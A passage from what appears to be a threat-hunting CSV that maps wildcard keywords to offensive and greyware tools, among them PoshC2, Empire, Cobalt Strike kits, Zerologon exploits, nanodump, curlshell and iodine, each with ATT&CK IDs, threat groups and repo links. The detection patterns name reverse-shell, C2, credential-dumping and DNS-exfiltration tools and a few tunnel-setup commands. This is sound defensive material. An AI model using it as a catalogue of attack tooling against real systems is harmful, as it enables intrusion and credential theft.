TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-WinlogonCheck*,offensive_tool_keyword,PrivescCheck,Privilege 
Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-winPEAS*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-winPEAS*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*invoke-winrmsession*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-WireTap*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-WlanProfilesCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - 
TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-WmiCommand *,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Invoke-WmiCommand*,offensive_tool_keyword,Wmisploit,WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.,T1087 - T1059.001 - T1047,TA0003 - TA0002 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/secabstraction/WmiSploit,1,0,N/A,N/A,2,163,39,2015-08-28T23:56:00Z,2015-03-15T03:30:02Z -*invoke-wmiexec *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-WMIExec*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - 
TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-WMIExec*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1024 - T1071 - T1029 - T1569,TA0002 - TA0003 - TA0040,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*invoke-wmijspayload*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*invoke-wmipayload*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-WmiShadowCopy*,offensive_tool_keyword,Wmisploit,WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.,T1087 - T1059.001 - T1047,TA0003 - TA0002 - TA0008,N/A,N/A,POST 
Exploitation tools,https://github.com/secabstraction/WmiSploit,1,1,N/A,N/A,2,163,39,2015-08-28T23:56:00Z,2015-03-15T03:30:02Z -*Invoke-WScriptBypassUAC*,offensive_tool_keyword,cobaltstrike,The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ElevateKit,1,1,N/A,10,10,812,205,2020-06-22T21:12:24Z,2016-12-08T03:51:09Z -*Invoke-WScriptBypassUAC*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-WScriptBypassUAC.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-WscriptElevate*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-WScriptBypassUAC.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-ZeroLogon*,offensive_tool_keyword,Invoke-ZeroLogon,Zerologon CVE exploitation,T1210 - T1212 - T1216 - T1003.001 - T1003.002 - T1003.003 - T1003.004,TA0001 - TA0004 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/BC-SECURITY/Invoke-ZeroLogon,1,1,N/A,N/A,3,203,46,2020-10-14T04:42:58Z,2020-09-17T05:01:46Z -*Invoke-Zerologon*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoking CreateSvcRpc (by @x86matthew*,offensive_tool_keyword,SspiUacBypass,Bypassing 
UAC with SSPI Datagram Contexts,T1548.002,TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/SspiUacBypass,1,0,N/A,10,2,167,27,2023-09-24T17:33:25Z,2023-09-14T20:59:22Z -*io_dirtycow.c*,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/nowsecure/dirtycow,1,1,N/A,N/A,1,93,30,2019-05-13T13:17:31Z,2016-10-22T14:00:37Z -*io_dirtycow.so*,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/nowsecure/dirtycow,1,1,N/A,N/A,1,93,30,2019-05-13T13:17:31Z,2016-10-22T14:00:37Z -*iocnglnmfkgfedpcemdflhkchokkfeii*,greyware_tool_keyword,sVPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*iodine -*,offensive_tool_keyword,iodine,tunnel IPv4 over DNS tool,T1573.001 - T1573.002 - T1573.003 - T1573.004,TA0011 - TA0002,N/A,N/A,Data Exfiltration,https://linux.die.net/man/8/iodine,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*iodined -*,offensive_tool_keyword,iodine,tunnel IPv4 over DNS tool,T1573.001 - T1573.002 - T1573.003 - T1573.004,TA0011 - TA0002,N/A,N/A,Data Exfiltration,https://linux.die.net/man/8/iodine,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*iolonopooapdagdemdoaihahlfkncfgg*,greyware_tool_keyword,Azino VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*iomoath/PowerShx*,offensive_tool_keyword,PowerShx,Run Powershell without 
software restrictions.,T1059.001 - T1055.001 - T1055.012,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/iomoath/PowerShx,1,1,N/A,7,3,267,46,2021-09-08T03:44:10Z,2021-09-06T18:32:45Z -*ionide *,offensive_tool_keyword,iodine,iodine. iodined - tunnel IPv4 over DNS,T1573.001 - T1573.002 - T1573.003 - T1573.004,TA0011 - TA0002,N/A,N/A,Data Exfiltration,https://linux.die.net/man/8/iodine,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*ionided *,offensive_tool_keyword,iodine,iodine. iodined - tunnel IPv4 over DNS,T1573.001 - T1573.002 - T1573.003 - T1573.004,TA0011 - TA0002,N/A,N/A,Data Exfiltration,https://linux.die.net/man/8/iodine,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*ios7tojohn.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*ip l set dev * address *:*:*,greyware_tool_keyword,ip,changing mac address with ip,T1497.001 - T1036.004 - T1059.001,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,N/A,5,10,N/A,N/A,N/A,N/A -*ip link set ligolo up*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ip link set ligolo up*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,0,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*ip route add * dev ligolo*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive 
tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ip tuntap add user root mode tun ligolo*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*IPeerToPeerService.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*IPfuscation.sln*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*IPfuscation.vcxproj*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*ipscan 1*.255*,greyware_tool_keyword,ipscan,Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation 
tools,https://github.com/angryip/ipscan,1,0,N/A,7,10,3517,683,2023-09-11T16:36:25Z,2011-06-28T20:58:48Z -*ipscan 10.*,greyware_tool_keyword,ipscan,Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/angryip/ipscan,1,0,N/A,7,10,3517,683,2023-09-11T16:36:25Z,2011-06-28T20:58:48Z -*ipscan 172.*,greyware_tool_keyword,ipscan,Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/angryip/ipscan,1,0,N/A,7,10,3517,683,2023-09-11T16:36:25Z,2011-06-28T20:58:48Z -*ipscan 192.168.*,greyware_tool_keyword,ipscan,Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/angryip/ipscan,1,0,N/A,7,10,3517,683,2023-09-11T16:36:25Z,2011-06-28T20:58:48Z -*ipscan.exe -*,greyware_tool_keyword,ipscan,Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/angryip/ipscan,1,0,N/A,7,10,3517,683,2023-09-11T16:36:25Z,2011-06-28T20:58:48Z -*ipscan-win64-*.exe*,greyware_tool_keyword,ipscan,Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/angryip/ipscan,1,1,N/A,7,10,3517,683,2023-09-11T16:36:25Z,2011-06-28T20:58:48Z -*iptables -%c OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP *,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Shell 
spawning,https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386,1,0,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z -*iptables -t nat -A REDSOCKS*,offensive_tool_keyword,wiresocks,Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,Defense Evasion,https://github.com/sensepost/wiresocks,1,0,N/A,9,3,250,24,2022-09-29T07:41:16Z,2022-03-23T12:27:07Z -*IReversePortForwardService.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*irkjanm/krbrelayx*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*irs.exe -*,offensive_tool_keyword,impersonate-rs,Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI,T1134 - T1003 - T1008 - T1071,TA0004 - TA0006 - TA0011,N/A,N/A,Exploitation tools,https://github.com/zblurx/impersonate-rs,1,0,N/A,N/A,1,77,4,2023-06-15T15:33:49Z,2023-01-30T17:11:14Z -*irs.exe exec*,offensive_tool_keyword,impersonate-rs,Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI,T1134 - T1003 - T1008 - T1071,TA0004 - TA0006 - TA0011,N/A,N/A,Exploitation 
tools,https://github.com/zblurx/impersonate-rs,1,0,N/A,N/A,1,77,4,2023-06-15T15:33:49Z,2023-01-30T17:11:14Z -*irs.exe list*,offensive_tool_keyword,impersonate-rs,Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI,T1134 - T1003 - T1008 - T1071,TA0004 - TA0006 - TA0011,N/A,N/A,Exploitation tools,https://github.com/zblurx/impersonate-rs,1,0,N/A,N/A,1,77,4,2023-06-15T15:33:49Z,2023-01-30T17:11:14Z -*irs.exe list*,offensive_tool_keyword,impersonate-rs,Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI,T1134 - T1003 - T1008 - T1071,TA0004 - TA0006 - TA0011,N/A,N/A,Exploitation tools,https://github.com/zblurx/impersonate-rs,1,0,N/A,N/A,1,77,4,2023-06-15T15:33:49Z,2023-01-30T17:11:14Z -*irsl/curlshell*,offensive_tool_keyword,curlshell,reverse shell using curl,T1105 - T1059.004 - T1140,TA0011 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/irsl/curlshell,1,1,N/A,10,10,269,28,2023-09-29T08:31:47Z,2023-07-13T19:38:34Z -*is_kirbi_file*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*is_proxy_stub_dll_loaded*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*isShellcodeThread*,offensive_tool_keyword,C2 related tools,An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/mgeeky/ShellcodeFluctuation,1,1,N/A,10,10,770,143,2022-06-17T18:07:33Z,2021-09-29T10:24:52Z -*issue_shell_whoami*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - 
T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*Itay Migdal*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*itm4n/PrintSpoofer*,offensive_tool_keyword,PrintSpoofer,Abusing Impersonation Privileges on Windows 10 and Server 2019,T1548.002 - T1055.001 - T1055.002,TA0005 - TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,1,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*itm4n/PrintSpoofer*,offensive_tool_keyword,printspoofer,Abusing impersonation privileges through the Printer Bug,T1134 - T1003 - T1055,TA0004 - TA0003 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,1,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*itm4n/PrivescCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*itm4nprivesc*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*its-a-feature/Apfell*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - 
